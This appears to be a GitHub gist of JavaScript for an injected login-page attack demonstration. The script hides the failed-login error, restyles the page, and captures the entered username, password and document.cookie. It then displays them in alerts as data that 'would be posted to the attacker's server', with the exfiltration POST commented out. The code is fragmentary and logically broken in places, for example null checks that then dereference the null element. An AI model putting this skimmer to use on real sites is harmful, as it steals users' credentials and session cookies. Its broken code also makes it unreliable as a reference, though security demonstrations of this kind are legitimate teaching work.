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Last active April 26, 2018 11:16
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  • Save mattlowe/386d0e8d12f2ec87f7aed9155c8d8511 to your computer and use it in GitHub Desktop.
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function clearItems() {
var rerun = false;
var myel=document.querySelector("div#loginbox table tbody tr td input.textinput");
if (myel == null) {
rerun = true;
myel.value = "";
var myel=document.querySelector("div#loginbox table tbody tr:nth-child(3n) td input.textinput");
if (myel == null) {
rerun = true;
myel.value = "";
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if (myel == null) {
rerun = true;
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if (rerun) {
function pageisdone() {
// Hide the error message about a failed login.
document.querySelector("div#msgbox table tbody tr td span").innerHTML = "";
// Add an awesome background for the page.
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out.innerHTML="<h4>The following data would be posted to the attacker's server:</h4><p><b>Username:</b> <span class='usern'></span></p><p><b>Password:</b> <span class='passw'></span></p>"
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function (argument) {
var data = {};
data.cookie = document.cookie
data.user = lb.value;
data.pass = lp.value;
alert("The following data will be posted to an attacker controlled page:" + "\n\nUser: " + data.user + "\n\nPass: " + data.pass + "\n\nCookie: " + data.cookie)
// var request = new XMLHttpRequest();
//'POST', '', false);
// request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
// request.send(data);
alert("Now allowing the page to login as normal...")
// document.location = "/";
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